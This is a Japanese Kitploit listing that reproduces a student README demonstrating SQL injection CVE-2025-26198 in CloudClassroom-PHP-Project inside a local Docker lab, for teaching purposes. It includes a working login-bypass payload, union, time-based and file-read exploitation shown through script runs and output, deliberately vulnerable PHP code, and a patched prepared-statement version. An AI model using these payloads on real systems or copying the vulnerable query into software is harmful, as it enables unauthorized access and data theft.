Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-26198 — CloudClassroom-PHP-ProjectにおけるCVE-2025-26198 SQLインジェクションの教育的再現。4つの悪用手法(ブール、ユニオン、時間ベース、ファイル読み取り)とパッチ適用版の比較を示します。 | Kitploit
ツール/GitHubGitHub/wailyacoubi9/cve-2025-26198
脆弱性分析ウェブアプリケーション悪用ペネトレーションテスト認証学習と教育データベースセキュリティ
GitHubwailyacoubi9/cve-2025-26198

CVE-2025-26198

CloudClassroom-PHP-ProjectにおけるCVE-2025-26198 SQLインジェクションの教育的再現。4つの悪用手法(ブール、ユニオン、時間ベース、ファイル読み取り)とパッチ適用版の比較を示します。

リポジトリを見る
17ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2025-26198 - SQLインジェクションのデモンストレーション

ENSIMAG 学術プロジェクト - セキュリティ3A
著者: Wail Yacoubi, Mohammed-Yassine Akhmari
日付: 2026年1月


警告

このコードは教育目的で意図的に脆弱にしています。
絶対に本番環境にデプロイしないでください。


説明

CVE-2025-26198の再現: CloudClassroom-PHP-Project v1.0における重大なSQLインジェクション。

CVEの特徴:

  • 識別子: CVE-2025-26198
  • CVSSスコア: 9.8/10 (重大)
  • タイプ: SQLインジェクション (CWE-89)
  • 脆弱コンポーネント: loginlinkadmin.php
  • 影響: 認証バイパス + データベース完全抽出

公式リファレンス: https://nvd.nist.gov/vuln/detail/CVE-2025-26198


目的

SQLインジェクションの4つの悪用手法をデモンストレーション:

  1. Boolean-based - 認証バイパス
  2. Union-based - データ抽出
  3. Time-based Blind - 遅延による検出
  4. File Read - システムファイル読み取り

インストール

前提条件

  • DockerおよびDocker Compose
  • Python 3.x
  • requestsをインストール: pip install requests

起動

root@kitploit:~
# Cloner le repository
git clone <votre-repo>
cd CVE-2025-26198

# Lancer l'infrastructure
docker-compose up -d

# Attendre que MySQL soit prêt (30 secondes)
sleep 30

# Vérifier les containers
docker-compose ps

アプリケーションは http://localhost:8081 でアクセス可能です。


悪用

方法1: 手動 (ブラウザ)

  1. http://localhost:8081 にアクセス

  2. フォームに入力:

    • Username : admin' OR '1'='1'-- -
    • Password : anything
  3. ログインをクリック

結果: 有効なパスワードなしで管理者ログイン成功。

説明:

ペイロードによってSQLクエリが変換されます:

root@kitploit:~
-- Requête normale
SELECT * FROM admin WHERE username='admin' AND password=MD5('test')

-- Requête avec injection
SELECT * FROM admin WHERE username='admin' OR '1'='1'-- -' AND password=MD5('test')

OR '1'='1'は常に真であり、-- -は残りをコメントアウトします。


方法2: Pythonスクリプト

シンプルスクリプト

root@kitploit:~
python exploit_simple.py http://localhost:8081

期待される出力:

root@kitploit:~
CVE-2025-26198 - SQL Injection Exploit
==================================================
[*] Target: http://localhost:8081/loginlinkadmin.php
[*] Payload: admin' OR '1'='1'-- -
[+] Exploitation successful
[+] Status Code: 200

完全スクリプト (4技術)

root@kitploit:~
python exploit.py http://localhost:8081

期待される出力:

root@kitploit:~
============================================================
  CVE-2025-26198 - SQL Injection Exploitation
============================================================

Test 1: Boolean-based Authentication Bypass
[+] Authentication bypass SUCCESSFUL
[+] Admin access obtained without valid credentials

Test 2: Union-based Data Extraction
[*] Detecting number of columns...
[+] Number of columns: 5
[+] Database name: cloudclassroom
[+] MySQL user: [email protected]
[+] MySQL version: 5.7.44
[+] Tables: admin,students
[+] Admin data:
    - admin:[email protected]
    - superadmin:[email protected]

Test 3: Time-based Blind SQL Injection
[*] Response time: 3.05 seconds
[+] Time-based injection CONFIRMED

Test 4: File Read via LOAD_FILE()
[+] File read SUCCESSFUL
[+] FILE privilege confirmed

EXPLOITATION SUMMARY
[✓] Boolean-based (Auth Bypass)
[✓] Union-based (Data Extraction)
[✓] Time-based (Blind Detection)
[✓] File Read (LOAD_FILE)

パッチ適用版

プリペアドステートメントを使用したセキュアバージョンをテスト:

root@kitploit:~
# Activer la version patchée
mv app/loginlinkadmin.php app/loginlinkadmin_VULNERABLE.php
mv app/loginlinkadmin_PATCHED.php app/loginlinkadmin.php
docker-compose restart web
sleep 3

# Retester l'exploit
python exploit_simple.py http://localhost:8081

期待される結果:

root@kitploit:~
[-] Error: Connection aborted
[-] Exploitation failed

攻撃は入力検証とプリペアドステートメントによってブロックされます。

脆弱バージョンに戻す:

root@kitploit:~
mv app/loginlinkadmin.php app/loginlinkadmin_PATCHED.php
mv app/loginlinkadmin_VULNERABLE.php app/loginlinkadmin.php
docker-compose restart web

バージョン比較

項目脆弱バージョンパッチ適用バージョン
SQLクエリ直接連結PDOプリペアドステートメント
入力検証なし英数字正規表現
出力エスケープなしhtmlspecialchars()
SQLインジェクション悪用可能ブロック
ログなしerror_log()

脆弱なコード:

root@kitploit:~
$sql = "SELECT * FROM admin WHERE username='$input_username' AND password=MD5('$input_password')";
$result = $conn->query($sql);

セキュアなコード:

root@kitploit:~
$stmt = $pdo->prepare("SELECT * FROM admin WHERE username = :username AND password = MD5(:password)");
$stmt->bindParam(':username', $input_username, PDO::PARAM_STR);
$stmt->bindParam(':password', $input_password, PDO::PARAM_STR);
$stmt->execute();

プロジェクト構造

root@kitploit:~
CVE-2025-26198/
├── README.md
├── RAPPORT.md
├── docker-compose.yml
├── app/
│   ├── index.html
│   ├── loginlinkadmin.php          # Version vulnérable
│   ├── loginlinkadmin_PATCHED.php  # Version sécurisée
│   └── sql/
│       ├── init.sql
│       └── grant_file.sql
├── exploit.py
├── exploit_simple.py
└── screenshots/

トラブルシューティング

Webコンテナが起動しない

root@kitploit:~
docker-compose logs web
docker-compose down
docker-compose up -d --build

エクスプロイトが動作しない

root@kitploit:~
# Vérifier MySQL
docker-compose exec db mysql -udbuser -pdbpassword -e "SELECT 1"

# Vérifier service web
curl http://localhost:8081

# Vérifier version active
head -n 2 app/loginlinkadmin.php

ポートが既に使用中

docker-compose.yml を修正:

root@kitploit:~
ports:
  - "8082:80"

ドキュメント

詳細な分析についてはRAPPORT.mdを参照してください。含まれる内容:

  • 脆弱性のメカニズム
  • システムアーキテクチャ
  • セキュリティ強化の推奨事項
  • 開発のベストプラクティス

参考文献

  • 公式CVE: https://nvd.nist.gov/vuln/detail/CVE-2025-26198
  • オリジナルプロジェクト: https://github.com/mathurvishal/CloudClassroom-PHP-Project
  • OWASP SQLインジェクション: https://owasp.org/www-community/attacks/SQL_Injection
  • PHP PDO: https://www.php.net/manual/en/pdo.prepared-statements.php

免責事項

このプロジェクトはENSIMAGのサイバーセキュリティコースの一環として、教育目的のみで開発されました。

許可される使用:

  • 学習とトレーニング
  • 許可された環境でのテスト

禁止される使用:

  • 実際のシステムへの攻撃
  • 悪意のある使用

学術的枠組み以外での使用は固く禁じられており、違法です。


著者
Wail Yacoubi & Mohammed-Yassine Akhmari
ENSIMAG - 2026年度
コース: セキュリティ3A

ツールをダウンロード